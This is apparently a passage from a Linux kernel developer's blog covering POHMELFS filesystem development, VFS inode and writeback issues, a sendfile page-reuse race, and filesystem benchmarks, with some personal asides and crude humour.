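		switch (ops[i].type) {
		case OP_CREATE:
			obj->exists = 1;
			obj->size = 0;
			break;
		case OP_WRITE:
			if (!obj->exists)
				return i;	/* write arrived before creation */
			obj->size += ops[i].len;
			break;
		}
	}
	return i;
}
```

A lone write handed to a different thread than the creation hits the early return, which is the situation the current reply-after-creation scheme avoids by sleeping.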
So far userspace server can run several or one processing thread per client,
but there are no transactions implemented. I just started
AIO
reading implementation, which should provide great speedup for any reading
workload.
Hardware (both client and server have the same hardware).
4-way (2 logical (HT) + 2 physical cpus) 3.00 Xeon (32 bits with PAE :), 8 GB of RAM,
Intel 82541GI gbit adapters, Seagate ST3300007LC 10k rpm scsi disk on
Adaptec AIC7902 PCI-X Ultra320 SCSI adapter.
Software.
Server: 2.6.25-rc7 kernel, in-kernel NFS server, userspace POHMELFS server.
Client: 2.6.25-rc8 kernel, in-kernel clients.
Both have all kernel debugging turned on.
Round 1. Huge directory (linux-2.6.24.4.tar archive) untarring over the network.
Picture shows it all.
Notice, that there is no test for POHMELFS reading (that is why it is only first round),
since it is miserable. And I know the reason: I'm lazy, so I use generic reading function
(generic_file_aio_read()), but actually Linux does not have AIO reading from usual files,
so it is very synchronous and requires to read data page-by-page, so we have a pretty
broken system in regards to network performance.
Since reading is not async, I will reimplement generic_file_aio_read() as
pohmelfs_aio_read(), which will be a real AIO reading function. That will be second round,
where POHMELFS will win.
But it can not win the game. Because things are changing. Today I learned, that
if filesystem has only 20 users over the world, then it
should not be
merged, since burden
of changing something generic in VFS (and thus propagate it to filesystems)
is too high.
What has happened? Linux kernel maintainers started to be afraid of changes?
Afraid of more code? Afraid of something new they do not want?..
Eh, and they tell they want more developers... They want monkeys who will do only what was
asked them to do.
POHMELFS will be sent for review of course, but it is highly unlikely
I will push it upstream.
When user files a bug, developer is supposed to fix it. That is
obvious and of course true.
But interesting things start showing in details.
If user pisses developer off, it is ok. If developer throws something back - it is bad.
If user does not answer, it is ok. If developer keeps silence - he is a bastard.
If user files a bug, it is ok. If developer asks user for some help - developer is a fucking monster.
Yes, there are real jerks in development community as well as among users,
and getting simple numbers: user community is much bigger than development one,
so number of crappy people scales as well. And nevertheless, people like to
blame developers and pray to users. This comes down to absurd, when developer
asks for help, and then he is blamed for not devoting time to solving a problem.
People like to look at others. I like to look at others too of course.
And we frequently like to forget that we behave exactly like those who
we blame to be jerks. Exactly like them. We just forgot that, or do not pay
attention, or do not want to think about,
since when things come to us, this becomes a hypocrisy.
Problem happened to be quite simple: writeback happens for
inodes in sb->s_io superblock list. They are placed
there from sb->s_dirty list, which contains dirty inodes.
Dirty inodes can be placed into that list via mark_inode_dirty(),
which checks if inode is hashed, if it is not, then it will not be placed into dirty list.
Hashed has a synonym in comments: valid...
There is sb->s_op->dirty_inode() superblock operation callback, which is invoked
first, so one can still implement own inode cache, do not use inode hash tables, do not
hash inodes and still put inodes into dirty list and thus be able to run writeback on them.
VFS: Busy inodes after unmount of pohmel. Self-destruct in 5 seconds. Have a nice day...
After removing private cache of inodes I found, that objects, which were
sent by the server and which were never attached to directory entry (dentry),
will never be freed.
So, essentially this does not work with Linux VFS:
iget()/iget_locked()
...
umount
Inodes, created by iget()/iget_locked() will be placed into at least three
different lists:
inode_in_use - global list of ever created inodes, which have i_count and i_nlink
more than 0
s_inodes - per superblock list, which contains every inode, created for this superblock
inode_hashtable - hash table indexed by inode number. If you want to
work with writeback,
your inodes have to be there. Did not yet investigate why.
So, essentially all inodes, which you created, are accessible by VFS and will be checked
during umount via generic_shutdown_super()->invalidate_inodes(),
where system will notice that if inode in s_inodes list has non-zero reference
counter (of course, otherwise it would be already freed by filesystem), then this inode
can not be freed. Thus we have a leak.
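
The check which produces the "Busy inodes after unmount" message can be reduced to a toy model. This is a userspace sketch with made-up structures, not the kernel's invalidate_inodes(): it only walks a per-superblock list and counts entries which still hold references.

```c
#include <assert.h>
#include <stddef.h>

struct toy_inode {
	unsigned long ino;
	int count;			/* reference counter, in the role of i_count */
	struct toy_inode *next;		/* per-superblock list, in the role of s_inodes */
};

/* Count inodes which still hold references at unmount time.
 * Any non-zero result corresponds to the leak described above. */
size_t count_busy(const struct toy_inode *head)
{
	size_t busy = 0;

	for (; head; head = head->next) {
		assert(head->count >= 0);	/* refcounts never go negative */
		if (head->count > 0)
			busy++;
	}
	return busy;
}
```

An inode which was obtained from the server but never attached to a dentry keeps its reference forever in this model, since nothing ever drops it.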
Above lists can only be accessed under global inode lock, so it is not a good idea to destroy inodes
traversing them in for example ->put_super() callback or in any other filesystem callback,
so I had to add a list of all inodes into POHMELFS superblock. Ugly.
Just found an article at LWN
about get_user_pages(). The main problem happened to be locking
between multiple threads...
Out of curiosity, was this
scalability problem fixed (for the busy reader: this is my more than 2-years old
testing of the get_user_pages() performance with single thread,
ran to find bottlenecks in kevent
AIO).
It has developed very rapidly last couple of days,
so essentially I rewrote it. I think it is ready for the next
release, which I will announce in a day or so.
Right now all first-milestone features except cache-coherency (check below),
which I planned, are completed (although maybe not in the most
optimal way sometimes).
Because of name cache usage it is now possible to create huge paths
with multiple directories via single command. The same applies to directory
removal,
although it is because of different design issue.
It would be possible to rewrite generic read/write helpers and provide
set of pages into POHMELFS network stack (which is page
based for data now), but I decided that for the first
step it is not needed.
POHMELFS has now fully async processing of all operations except link creation
(I just decided that it is a bit simpler to make them write-through,
it was done because of laziness and not some fundamental arch problems).
It was achieved by serious (read: from scratch) changes in the arch,
which had own problematic places, namely error report. Because of this
move it becomes really simple to implement any kind of protocol, if it obeys
async rules, namely sending of the message never requires sync reply,
and where it is needed, reply comes as an independent incoming message,
which is processed asynchronously from waiting and via common state machine.
Such arch allows to have simple cache coherency algorithm, when server just sends
missed entries or commands to remove some objects and client's core handles that just
fine since its receiving code does not depend on sending one. This is not
100% correct way to handle collisions (collisions thus became new objects
in the filesystem tree, like old name plus some suffix), but it is what lots
of the users need, but not real cache-coherency.
Writeback cache does not play very well with cache-coherency, since every metadata
changes (like object creation or removal)
has to be checked against server state, since different clients can do the same with
the same object. Level of paranoia has to be thought of in advance.
First cache-coherency step is implementation of the trivial scheme, when
every object is synced during its writeback time and changes are broadcast by server
to other clients. If another client has the same object being processed
it can either be renamed to collision or just overwritten. Having locks
and thus real states is a next step.
Also, POHMELFS does not have authentication and strong checksums right now,
and although this is a simple task to implement, its priority is questionable.
There is also possibility to implement cryptographically strong encryption of the
communication channels.
So, lots of ideas, but main part is ready - async data processing design was
definitely a right choice to implement, so all other features become very simple
to complete.
New release will be announced very soon, stay tuned!
For quite a while I have had a quite interesting but very antisocial theory in my
mind. A hacker's behavioural theory.
Lets talk about male here (frankly, I never saw a female hacker with similar
behavioural aspects).
Main theory key is about the fact, that when person has something really
interesting for himself, he does not want to spend his (limited)
time with others. Just because he is so selfish (in a good meaning of this word),
that he just does not need any one near to spend time with, just because he can
create or get real problem for himself and devote all the time to it. There can be lots
of other people around, but eventually (if they are not a really good friends,
who understand that immediate timeframe does not matter) they all understand
that their time does not come back.
Such people do not really think about others, they think about the problem, which
lives in mind right now. This does not always mean that they do not like other people (which
actually can be true), but only that they are somewhere in another place with
another thoughts.
Maybe they will return back to usual life and devote their time
to other people not to some problems, or maybe not...
This is a new motto for POHMELFS.
It is a completely new filesystem now.
POHMELFS got new page processing code (sending side: commands and data), new lookup,
which is based on the Linux VFS inode cache without reinventing the wheel (comment
says it is very smp-friendly, although I do not quite understand how
it is possible with global inode_lock), it also got
completely new object creation and referencing path. It is possible
to create a huge path (up to 4k, but can be easily extended if there will be such demand)
with multiple objects in it with only single network command.
But the main feature of new POHMELFS is its name cache. I did not find
how to hook into VFS dentry cache, so invented own. It is fast
to traverse from child to the highest level parent, which is actively
used in POHMELFS writeback path. Although it is not 100% the best
storage, but a simple RB-tree (and thus requires smp-unfriendly mutex), the whole
idea shows its gains already. Eventually it will be replaced with
faster and more scalable approach protected by RCU (even properly sized hash
table will show better scalability, although dynamic resizing of hash tables
prevents RCU usage), but I started from the simplest ground.
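
The child-to-parent traversal which the name cache is optimized for can be sketched in userspace like this. The structure and build_path() are hypothetical and much simpler than a real cache (no tree, no locking): each entry only knows its own name and its parent, and the full path is assembled backwards from the end of the buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct name_entry {
	const char *name;
	const struct name_entry *parent;	/* NULL for the root */
};

/* Build the full path of 'e' inside buf by walking parents and filling
 * the buffer from its end. Returns a pointer to the start of the path
 * inside buf, or NULL if the buffer is too small. */
char *build_path(const struct name_entry *e, char *buf, size_t size)
{
	char *p;

	assert(buf != NULL && size > 0);
	p = buf + size - 1;
	*p = '\0';
	for (; e && e->parent; e = e->parent) {
		size_t len = strlen(e->name);

		if ((size_t)(p - buf) < len + 1)
			return NULL;
		p -= len;
		memcpy(p, e->name, len);
		*--p = '/';
	}
	if (p == buf + size - 1) {	/* entry was the root itself */
		if (size < 2)
			return NULL;
		*--p = '/';
	}
	return p;
}
```

Filling from the end means no reversing or second pass is needed, and the walk costs one step per path component, which matters when it runs for every object in the writeback path.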
POHMELFS already outperforms async NFS during untarring and completely saturates
my testing Xen domains (both network and disk speed), while NFS is almost two
times slower. Testing machines have 256 Mb of RAM, maximum 3 MB/s interconnect speed
(something is broken in Xen setup likely, since it is supposed to be 100 mbit/s
and there is no high load), which is very unfriendly (read: in such scenario POHMELFS
will show its worse results) for POHMELFS, but nevertheless it is fast.
It became not only much faster, but also simpler. Its userspace server has
two times less lines of code (816 vs. 1613), kernel side is smaller and simpler too:
mainly there are no zillions of different trees indexed by any possible keys,
so far only per-inode tree of child names for readdir and per-superblock path
entry cache.
There are drawbacks of course: there is no receiving code (at all). It will be a dedicated
thread, which will asynchronously process all incoming packets (mostly
async readdir replies, read page content and cache-coherency messages). The first
two are really simple. The last one will be implemented as a full MOSI/MSI
library for inode content. It will likely be possible to use it in my
other projects.
P.S. I frequently think that I'm a very good vapourware seller :)
Stay tuned!
Because it more easily allows your eyes to see the different operators.
The same applies to more common:
for (i=0; i<10; ++i) vs
for (i = 0; i < 10; ++i)
The latter just wastes lots of space and makes the eyes pop out of their orbits.
That is my own opinion; obviously the more people are involved, the more opinions clash.
So, never kick someone when he is on the edge by forcing him to change simple stuff in coding style:
he can return and kick you back when you are on your own edge...
Ugh, and I forgot what is likely the favourite one:
for (i=0; i<10; ++i) vs
for (i=0; i<10; i++)
Update: Oh holy crap: I recall people comparing their uptimes to show whose dick is longer, that is, who is more cool,
but comparing the number of whitespaces-instead-of-tabs errors per subsystem is a real winner of the modern
cruel reality! Hope you have a sense of humor; let's convert the number of errors per 1000 lines of code
into length (100*kloc/errors):
kernel/ maintainer has this big: ===========D
arch/alpha maintainer has this big: =D
arch/arm maintainer has this big: ==D
arch/avr32 maintainer has this big: ============D
arch/blackfin maintainer has this big: ===================================D
arch/cris maintainer has this big: =D
arch/frv maintainer has this big: ====D
arch/h8300 maintainer has this big: =D
arch/ia64 maintainer has this big: ==D
arch/m32r maintainer has this big: ====D
arch/m68k maintainer has this big: ==D
arch/m68knommu maintainer has this big: =====D
arch/mips maintainer has this big: ====D
arch/parisc maintainer has this big: D
arch/powerpc maintainer has this big: ==D
arch/ppc maintainer has this big: =D
arch/s390 maintainer has this big: =D
arch/sh maintainer has this big: ====D
arch/sparc maintainer has this big: ==D
arch/sparc64 maintainer has this big: ===D
arch/um maintainer has this big: ==D
arch/v850 maintainer has this big: ===D
arch/x86 maintainer has this big: =D
arch/xtensa maintainer has this big: ==D
And a couple of my projects:
fs/pohmelfs maintainer has this big: =======D
drivers/block/dst/ maintainer has this big: ============D
drivers/connector maintainer has this big: ===D
drivers/w1 maintainer has this big: =======D
That was quite a short although quite hard training. After
a number of warm-up traverses I started jumping again - now
I created a 'trace' myself on the huge
horizontal negative slope, so sometimes I fell on my back
from about a meter, which was even fun. Eventually I managed
to complete my own jumping holds, which resulted in very
rubbed fingers and toes, so essentially the rest
of the training was predefined to be something trivial.
Nevertheless I managed to try some old complex start
a couple of times, fell of course, but it was worth it.
The usual finish of the training - sauna - today was exceptionally
dry and hot - about 99 degrees Centigrade, and it was even
hard to breathe, since the air was so dry.
Anyway, excellent time!
So essentially there is no way to implement my own inode
cache tied to the system's writeback mechanism, which is bad
news. POHMELFS in its current reincarnation does not use
the system's inode cache and all its inodes are unhashed, which
results in the fact that they are never synced, since the writeback
mechanism just does not see them.
So I will fall back to hashed inodes, which will be used just for that,
and writeback for a single inode will end up creating the directory structure
for all the upper-layer objects.
Another idea is to implement my own writeback, which would be scheduled from the
main one or after memory notifications. This approach actually has lots of
advantages, but let's first complete the simpler part with hashed inodes.
This is called a learning curve - I'm essentially where I was before,
but with extended baggage of knowledge.
Summary of the previous series with this pompous header:
When sendfile() returns, the pages it sent can still be queued in the TCP
stack or hardware, so a subsequent write into them will end up
corrupting data which will eventually be sent. This concerns all
->sendpage() users, namely sendfile() and splice().
We can safely reuse those pages only when an ack is received from the
remote side, which forces the network stack to release the pages.
My simple extension allows hooking into the data releasing path and performing
any actions we want. This is achieved by replacing skb->destructor with
a callback registered by the interested user, for example the splice/sendfile
code. Splice (the pipe info structure) in turn is extended to hold an atomic
counter of the pages in flight (without a structure size change, because of
the alignment issues it has right now), so the splice code will sleep when a full
pipe info (->nrbufs pages) has been sent: it will wait until the number of pages
in flight, which is decremented in the private splice callback, hits zero.
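The counting scheme can be modelled in userspace like this. It is a rough Python sketch, not the kernel patch: `PagesInFlight` and its methods are hypothetical names, a condition variable stands in for the atomic counter plus wait queue, and a timer thread plays the role of the remote ack triggering the destructor callback.

```python
import threading


class PagesInFlight:
    """Counts pages handed to the network stack and not yet released."""

    def __init__(self, nrbufs):
        self.nrbufs = nrbufs      # size of the pipe, in pages
        self.in_flight = 0        # pages sent but not yet released
        self.sent = 0             # pages sent since the last full drain
        self.cond = threading.Condition()

    def page_sent(self):
        with self.cond:
            self.in_flight += 1
            self.sent += 1

    def page_released(self):
        """Plays the role of the private destructor callback."""
        with self.cond:
            self.in_flight -= 1
            if self.in_flight == 0:
                self.cond.notify_all()

    def wait_if_full(self, timeout=None):
        """Once a full pipe was sent, sleep until nothing is in flight."""
        with self.cond:
            if self.sent < self.nrbufs:
                return True
            drained = self.cond.wait_for(lambda: self.in_flight == 0, timeout)
            if drained:
                self.sent = 0
            return drained


pipe = PagesInFlight(nrbufs=2)
pipe.page_sent()
pipe.page_sent()
# Simulate the remote ack arriving a bit later on another thread.
acker = threading.Timer(0.05, lambda: (pipe.page_released(), pipe.page_released()))
acker.start()
print(pipe.wait_if_full(timeout=5))  # True once both pages were released
acker.join()
```

Only after `wait_if_full()` returns is it safe for the sender to write into those pages again.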
The patch was tested with simple send and recv applications, which can be
found in the archive.
One has to run them on different machines, since loopback uses a slightly
different scheme (namely the page is _never_ copied, so when it is received
by the 'remote' side, it still exists on the 'local' side, and modifications
will end up in data corruption).
devfs1# ./recv -a 0.0.0.0 -p 1025 -c 1024
devfs2# ./send -a devfs1 -p 1025 -f /tmp/test -c 1024
In case of failure you will get this:
Connected to devfs1:1025.
/tmp/test/1024 -> devfs1:1025
Data was corrupted: ab.
after a short period of time, where the above 'ab' is a hex byte written into
the mapped file, which has been sent, immediately after sendfile()
returns to userspace.
Data is supposed to be always zero, and the applications should run forever.
The -c parameter specifies the number of bytes to be sent in each run of
sendfile(). It has to be the same on both machines.
Suddenly it started to eat my CPU by getting the time every 50ms... I can not
say why that is needed, except as some sign of an AI calibrating
its ion cannon. Fortunately it was killed before any damage (except
a screaming cooler on the processor) was done.
A couple of days ago I talked with a person who ordered 4 high-end 128G SSD disks
to create a RAID for testing purposes; the seek time for those devices is 0.1ms.
Each one costs about $4k. His main workload is databases, i.e. random reads and writes,
so we calculated that theoretically it has to be about 14 times faster than
high-end SCSI disks with 3.5 ms seek latency and about 100 MB/s sequential access speed
in the given workload of processing random data in 8-16kb chunks (the usual 'page' in SQL servers).
Besides the fact that putting 14 disks into a mirror will (theoretically)
be as fast as a single SSD disk, will be 14 times more reliable
and will likely have a smaller price,
the main use is to replace RAM with SSD, not disks with SSD.
My prognosis is that SSD will be at most 2-3 times faster (if it is faster
at all, since its theoretical performance advantages can be killed by the FS)
than a SCSI disk for the given workload, and as is, it is not a breakthrough technology.
If I'm wrong (it will likely be tested next week with the
sysbench read-write benchmark),
I will buy a good bottle of whiskey for us, otherwise...
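The factor of about 14 can be reproduced with a back-of-the-envelope model. The assumptions here are not stated above and are only one possible reading: each random request costs one seek plus the transfer of one chunk, both devices transfer at the same 100 MB/s, and the chunk is 16 KB. The function names are made up for the illustration.

```python
def request_time_ms(seek_ms, chunk_bytes, bytes_per_second):
    """Time for one random request: one seek plus the chunk transfer."""
    return seek_ms + chunk_bytes / bytes_per_second * 1000.0


def speedup(chunk_bytes, disk_seek_ms=3.5, ssd_seek_ms=0.1, bytes_per_second=100e6):
    """How many times faster the SSD serves one random chunk (assumed model)."""
    disk = request_time_ms(disk_seek_ms, chunk_bytes, bytes_per_second)
    ssd = request_time_ms(ssd_seek_ms, chunk_bytes, bytes_per_second)
    return disk / ssd


for kb in (8, 16):
    print(kb, "KB chunks:", round(speedup(kb * 1024), 1))
```

With 16 KB chunks the ratio comes out close to 14; with 8 KB chunks the model gives a noticeably larger ratio, since the seek time dominates even more. None of this accounts for the filesystem or RAID overhead, which is exactly what the prognosis above is about.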
So, I have to admit that I rethought my opinion
about mirroring/redundancy at the filesystem layer - it is useful in lots of cases,
and modulo bugs in DST
mirroring (mostly a leak, which I can not find in my lab,
and a network/block layer race,
which has existed in sendfile() for years and just strikes DST a lot,
although it has a workaround) I decided to rewrite the mirroring algorithm in a way
that it could be used in other projects.
There is also an idea of how to fix the abovementioned network/block layer race in a
very non-disturbing manner, which was privately called soft
DST barriers.
The idea is to replace the skb destructor with a private one, which will signal that
the pages are no longer used (for example call bio_endio() or
release a splice buffer). This callback will be installed only for special sockets
which provide it (like DST, sendfile() or any other
->sendpage() users like samba). The idea was
not killed at its roots,
which is a good starting sign.
I actually do not understand what prevents filesystem writers from implementing
a trivial interface and access library for metadata manipulations,
which would allow not only path lookup,
but also lookup by various keys, for example those stored in extended attributes.
Yes, it requires filesystem changes, but I can not believe it is impossible
or even too complex.
Need to think...
The DST
project was quiet for a while, but actually it is not.
There is a bug in the mirror algorithm, which I am considering rewriting. Not because of
this bug, but because it will be used in a special setup where an extension of it is required.
Consider a highly available *SQL cluster with multiple storage nodes combined into
a mirror and several main systems which run the database software. Unfortunately
only a single main system works with queries; another has to be turned on when the first one fails.
The task is to create a system which will automatically switch between main nodes and
recover if either main nodes or storage nodes become unavailable, so that the whole
system does not stop if something wrong happened to the machines. It has to scale
to tens of nodes as a must and later to hundreds without problems.
This is not a performance scalability solution - so far only a single node should be able to
collect multiple data nodes into storage, and if that node fails it has to be switched,
but so far I do not know of any working and free solution for the problem. The solution created
for main node switching can also be used in cases when any server (for example a metadata server
in a cluster) has failed and has to be switched.
It will also force me to finally implement barriers in DST.
As a possible helper for availability messages
I am considering the abandoned CARP-like
protocol (in userspace).
That was hard training. Since I climb only once per week (this year so far),
I can not get into my best shape, mostly in the resistance part, so my fingers
were rubbed quite quickly...
Nevertheless I finished my jumpings
and reached the needed hold. The jump actually was not that high - about 30-40 centimeters,
but it has to be done from holds which are about 2 meters below the final hold,
so it was not that simple, especially when the holds for arms are only 10 centimeters
higher than those for legs, and the main body's chakra (it is a nice name for the ass
in my own public dictionary) really does not like to fly and wants to land.
Then I did a number of various starts, some with jumps, others were just the usual
complex traces without additional requirements from me...
Evening sauna, shower and great pleasure of the day.
Excellent time!
The simulation works on each filesystem in the following stages:
The empty filesystem is created and mounted.
The directory structure is created, with no files.
A single delivery simulator and retrieval simulator are run
simultaneously. The script waits for each of the simulators to finish,
and then runs the sync command before proceeding to the next
step.
The above step is repeated with 2, 4, 8, and then 16 delivery simulators.
Delivery Simulator.
The delivery simulator does actual maildir deliveries to the given directory:
It writes a file with a unique file name to the tmp subdirectory.
It fsyncs the newly written file.
It renames the file into the new subdirectory.
It fsyncs the new subdirectory (to ensure that
directory is actually on disk, as most Linux filesystems don't
automatically perform this action during the rename).
Briefly speaking, it is a multithreaded maildir simulation.
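The four delivery steps listed above look roughly like this in code. This is a minimal Python sketch for Linux, not the benchmark's perl script: `make_maildir` and `deliver` are hypothetical helpers, and a random UUID is assumed to be good enough as the unique file name.

```python
import os
import tempfile
import uuid


def make_maildir(root):
    """Create the empty maildir directory structure."""
    for sub in ("tmp", "new", "cur"):
        os.makedirs(os.path.join(root, sub), exist_ok=True)


def deliver(maildir, data):
    """One maildir delivery: write to tmp, fsync, rename into new, fsync new."""
    name = uuid.uuid4().hex  # assumption: any unique name will do
    tmp_path = os.path.join(maildir, "tmp", name)
    new_path = os.path.join(maildir, "new", name)

    # 1-2. Write the file under a unique name in tmp and fsync it.
    with open(tmp_path, "xb") as f:
        f.write(data)
        f.flush()
        os.fsync(f.fileno())

    # 3. Rename the file into the new subdirectory.
    os.rename(tmp_path, new_path)

    # 4. fsync the new subdirectory so the rename itself reaches the disk.
    dir_fd = os.open(os.path.join(maildir, "new"), os.O_RDONLY)
    try:
        os.fsync(dir_fd)
    finally:
        os.close(dir_fd)
    return new_path


with tempfile.TemporaryDirectory() as root:
    make_maildir(root)
    path = deliver(root, b"Subject: test\n\nhello\n")
    print(os.path.basename(os.path.dirname(path)))  # prints new
```

The benchmark runs several such deliverers in parallel, so the cost it measures is dominated by the two fsync calls per message.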
And the results
are quite different compared to, for example, postmark: very good results from xfs, jfs and reiserfs.
There are no ext2 and btrfs results, since perl's fsync says that
the file descriptor opened there is invalid:
Invalid argument at /root/fs_bench/maildir_fsbench/fsbench/fake-deliver line 38.
An interested reader can check the sources and show me the problem, but ext2 worked just fine with
the 2.6.20 kernel and whatever glibc/perl was in Debian at that date.
Now all testing is over.
Main conclusion: things got worse compared to 2.6.20, and there was no major breakthrough in filesystem development, at least
from the performance point of view.
Results are slightly better than in the previous
xfs run, although barriers are turned off, which I blame as the main reason. Other
filesystems also did not turn off directory atime.
Anyway, even with these results XFS is still much worse than any other FS (except reiserfs)
for this workload.
An interested reader can check out the results
of the ext2/3/4, reiserfs, reiser4, jfs, xfs and btrfs fight for the first prizes
in dbench, iozone, postmark, the maildir performance bench
and a simple file creation micro-benchmark.
It does not contain the maildir benchmark yet, I will add it tomorrow or later today;
xfs has not completed yet and there are no graphs.
As a conclusion: nothing major has changed since the previous contest,
the new btrfs filesystem behaves not that badly in some cases,
but is quite slow in others... Nothing changed.
I've started mostly from scratch. I think it is a good sign
when a project can be rewritten without any pain to implement
really interesting ideas instead of having multiple crutches all over the
place. This also means that it is not that complex, so I do not regret
the dropped code.
Now it is in a very early testing stage without a network protocol at all,
but I am testing a new paradigm in pohmelfs: its inodes will not be hashed
into the global hash table, but instead will be placed into a local
trie-like structure, which (optionally) will allow RCU-fied lookup.
It is something similar to the data structure created for the
multidimensional trie
used in the unified socket lookup patch.
I really like the two-hash
approach, but since there is no proof (yet) that it will work for all possible cases,
I will first implement a radix-like tree to store object names. The network
protocol will also operate on full-length paths, which actually can be
a bad idea; I will see.
Another uber cool feature of the full-path approach
is the ability to create a number of directories, which form a path to the given
object, in a single command, i.e. when a client sends a network command
to create object /a/b/c/d/file, there is no need to send
separate commands to create /a, /a/b and so on,
it can be done automatically by the server. This requires sending not only the
path though, but also information about permissions for each subdir.
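On the server side such a command could be handled roughly as follows. This is a Python sketch with a made-up command shape (a path plus one mode per intermediate directory), not the actual POHMELFS protocol; `create_object` is a hypothetical name, and no sanitising of '..' components is done here.

```python
import os
import tempfile


def create_object(root, path, dir_modes, file_mode=0o644):
    """Handle one 'create' command for a full path such as /a/b/c/d/file.

    `dir_modes` carries one permission value per intermediate directory,
    so the server can create every missing directory by itself.
    """
    parts = [p for p in path.split("/") if p]
    dirs, name = parts[:-1], parts[-1]
    if len(dir_modes) != len(dirs):
        raise ValueError("need exactly one mode per intermediate directory")

    current = root
    for directory, mode in zip(dirs, dir_modes):
        current = os.path.join(current, directory)
        if not os.path.isdir(current):
            os.mkdir(current, mode)  # the effective mode is still subject to umask

    full = os.path.join(current, name)
    fd = os.open(full, os.O_WRONLY | os.O_CREAT, file_mode)
    os.close(fd)
    return full


with tempfile.TemporaryDirectory() as export_root:
    created = create_object(export_root, "/a/b/c/d/file", [0o755] * 4)
    print(os.path.relpath(created, export_root))
```

One command thus replaces five round trips (four mkdirs and one create), which is the whole point of sending full paths.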
Although I plan to run a couple of additional tests for btrfs,
namely all tests with the nodatacow option and without the ssd option,
which will likely take part of the day. But all others are
already completed, so expect nice graphs tomorrow.
There were a number of surprises during that testing. For example
reiser4 constantly freezes the test box in the dbench workload
with 150-200 threads. There are no messages in dmesg, but nothing
is turned on in the kernel hacking section of the config. Both
btrfs and reiser4 are very slow at creating and writing into
lots of small (4k) files. Reiser4 is two times faster than btrfs;
the latter creates/writes/syncs/closes about 10 files per second
on average when 10k-30k files are created one-by-one.
Ext4 is also slower than any other filesystem (except the above two)
in this microbenchmark.
Something strange happened between the 2.6.20 and 2.6.24 kernels: the above file
creation microbenchmark produced much worse results for all
filesystems (an order of magnitude in some cases) compared to the previous
contest.
Maybe the sync code was finally implemented correctly, I do not know...
I will likely drop the maildir
benchmark results, since the perl script which works there constantly tells me
that fsync() has an invalid parameter...
So, wait about 12 hours (I have to get some sleep: do not mix
absinthe with different red wines and beer. When I did that last
night it was quite tasty, but not so this morning)
Subvolumes
are block devices on top of which btrfs
can be created. This is the first known filesystem in Linux which can be built on
top of multiple block devices. Chris Mason renamed his unstable branch to
really-really unstable because of that. It is possible to put devices into
mirror or striping mode, although how is far from clear from the short
mail description.
Although support for mirroring and striping in a filesystem is a questionable feature,
the ability to create a filesystem on top of multiple block devices with per-device
allocation policies is a huge step in Linux filesystem development.
So far I have removed the maildir
test and the file creation benchmark: the former requires a manual start in my
scripts, the latter requires some filesystems to be removed from the run,
namely Reiser4 and BTRFS, since both are very slow at creating and writing into lots of small
(4k) files. XFS is probably also a candidate, although with the optimizations described below
it behaves much better than with default options and the 2.6.21 tree.
Testing is being performed with the 2.6.24.3 tree. Reiser4 was ported from the latest
breakout of the -mm tree (it requires lots of manual patching to be started on recent kernels).
BTRFS was taken from the unstable
branch, since it is the same as 0.13 AFAICS. All other filesystems were taken from the
vanilla tree.
The following optimisations are used for the filesystems:
XFS: mkfs: -d agcount=1 -l size=128m,version=2, mount: noatime,logbsize=256k,
as suggested by Dave Chinner
BTRFS: mkfs: -l 4k -n 4k, mount: noatime,nodatasum, for postmark also added ssd option,
as suggested by Chris Mason
First results are expected to be ready tomorrow evening or even after the weekend... Although all runs
are being performed automatically, generating nice graphs
requires a manual start. Then I will proceed with the maildir
test and the file creation benchmark.
That was really cool training today: the most exciting
part was lots of jumps. It was not a new trace, but a special
hold on the balcony, which could be reached from lower positions
with a jump. I spent more than an hour jumping from different holds
to the finish one, although I did not succeed in the main jumping direction.
Instead I damaged a shoulder, rubbed my fingers and toes, got tired as
hell and got a zillion units of pleasure. Also added a couple of simple
and quite complex old traces to the mix.
That was an excellent time!
3 Intel E7520 systems, each with two 3 GHz Xeon CPUs with HT enabled and EDAC bits,
4 GB of RAM and an Adaptec AIC7902 Ultra320 SCSI adapter. Disks:
FUJITSU MAU3036NC 15k rpm 32 GB system disk (will also be used in testing), two of them
will be installed in a mirror later,
SEAGATE ST3300007LC 10k rpm 300 GB testing disk.
The former has about 90 MB/s linear read speed, the latter - 75 MB/s.
It takes about 5 minutes to fully compile and link a loadable kernel.
Pretty neat machines, and I have managed to lose three system disks already. Doesn't
that say something about my bad karma? Without any load, without kernel changes, without anything...
Is it because they are called devfs[123] and are thus struck by problems
like that old virtual filesystem, which eventually died a tortured death?
Waiting again... Since one machine is still alive, I will start the filesystem contest
tomorrow; development will be postponed a bit.
One man, 12 nights (13 days), one bottle of Cuban rum and
a little bit of scotch whisky, 82 'House M.D.' episodes... feels good.
Meanwhile I got three 2-way Xeon servers with 2-4 (I forgot) gigs of RAM and
a gigabit link between them. Not bad for a start.
I also gathered lots of power and inspiration, so here is the plan:
second filesystem contest:
now I will test btrfs 0.13 and btrfs-unstable in addition to the previous
ext[234], reiser[34], jfs and xfs running for the first prizes in
dbench, iozone, postmark, the maildir performance bench
and a simple file creation micro-benchmark. The results will show the need for
yet another local filesystem. Making bets?
fix two problems in distributed storage:
there is a leak in mirror resync and an inability to start a storage if the config contains
wrong network addresses.
rewrite core pohmelfs algorithms to make it not good, but really good. This change will
make it first against CRFS and CacheFS :)
POHMELFS is not where I want it to be right now.
I can not win the fight with some issues (or better
call them by their real name: temptations), so... there is
an old method to solve this problem:
if you can not win against some temptation, just fall for it.
That is what I have been doing for the last couple of days: I have already
watched 2.5 seasons of the "House M.D." series and expect to complete the last
ones soon...
That is why I do not write about the real hacking problems I work on,
but... stay tuned, I'm just accumulating really strong power.
# mount /dev/dvd /mnt
...^C
# dmesg | tail
[ 853.189807] sr 1:0:0:0: [sr0] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE,SUGGEST_OK
[ 853.189822] sr 1:0:0:0: [sr0] Sense Key : Medium Error [current]
[ 853.189832] sr 1:0:0:0: [sr0] Add. Sense: No seek complete
[ 853.189843] end_request: I/O error, dev sr0, sector 9180408
[ 853.189852] Buffer I/O error on device sr0, logical block 1147551
...
# dd if=/dev/dvd of=/tmp/data bs=1M
# mount -o loop /tmp/data /mnt
# ls /mnt
Doctor House
So I can not mount the dvd via mount, but can do the same after a sequential
read of the dvd into a file. This seeking error looks like a problem with the
hardware _or_ the linux driver. I know hardware sucks, but if sequential read works
I can not understand why anything else does not...
Sigh, it is the 21st century outside, iirc...
The main problem is that everything else sucks even more. And everyone is guilty:
for example there is a bug in the hifn 795x hardware crypto accelerator
driver I wrote, which is in the mainline, or two in the DST
project, or anywhere else. I wish the world was perfect...
